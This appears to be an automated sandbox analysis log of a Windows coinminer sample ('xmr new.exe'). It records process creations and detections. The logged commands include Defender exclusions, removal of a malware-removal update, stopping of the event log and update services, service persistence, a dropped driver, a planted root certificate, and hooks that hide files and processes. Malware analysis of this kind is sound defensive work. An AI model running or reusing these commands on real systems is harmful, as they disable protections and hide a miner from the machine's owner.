        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"Jump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"Jump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\xmr new.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: xmr new.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: xmr new.exeStatic file information: File size 5471744 > 1048576
        Source: xmr new.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x52a800
        Source: xmr new.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Windows\System32\dialer.exeCode function: 66_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,66_2_00000001408460F0
        Source: xmr new.exeStatic PE information: section name: .00cfg
        Source: eejhedztifcv.exe.0.drStatic PE information: section name: .00cfg
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BAACDD push rcx; retf 003Fh31_2_000001F385BAACDE
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BDC6DD push rcx; retf 003Fh31_2_000001F385BDC6DE
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385C0ACDD push rcx; retf 003Fh31_2_000001F385C0ACDE
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A2911DACDD push rcx; retf 003Fh37_2_000002A2911DACDE
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A2919AC6DD push rcx; retf 003Fh37_2_000002A2919AC6DE
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E255EACDD push rcx; retf 003Fh40_2_0000014E255EACDE
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EEC6DD push rcx; retf 003Fh40_2_0000014E25EEC6DE
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F3ACDD push rcx; retf 003Fh42_2_00000283E0F3ACDE
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F6C6DD push rcx; retf 003Fh42_2_00000283E0F6C6DE
        Source: C:\Windows\System32\dialer.exeCode function: 65_2_0000000140001394 push qword ptr [0000000140009004h]; ret 65_2_0000000140001403
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB539AACDD push rcx; retf 003Fh67_2_000001FB539AACDE
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB539DC6DD push rcx; retf 003Fh67_2_000001FB539DC6DE
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BBACDD push rcx; retf 003Fh68_2_000001CBD8BBACDE
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BEC6DD push rcx; retf 003Fh68_2_000001CBD8BEC6DE
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD14ACDD push rcx; retf 003Fh69_2_000001F2BD14ACDE
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD17C6DD push rcx; retf 003Fh69_2_000001F2BD17C6DE

        Persistence and Installation Behavior

        barindex
        Installs new ROOT certificates
        Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Sample is not signed and drops a device driver
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeFile created: C:\Windows\TEMP\zhgmaxoaawxc.sysJump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeFile created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeJump to dropped file
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeFile created: C:\Windows\Temp\zhgmaxoaawxc.sysJump to dropped file
        Source: C:\Users\user\Desktop\xmr new.exeFile created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeJump to dropped file
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeFile created: C:\Windows\Temp\zhgmaxoaawxc.sysJump to dropped file
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

        Hooking and other Techniques for Hiding and Protection

        barindex
        Hooks files or directories query functions (used to hide files and directories)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Hooks processes query functions (used to hide processes)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
        Hooks registry keys query functions (used to hide registry keys)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
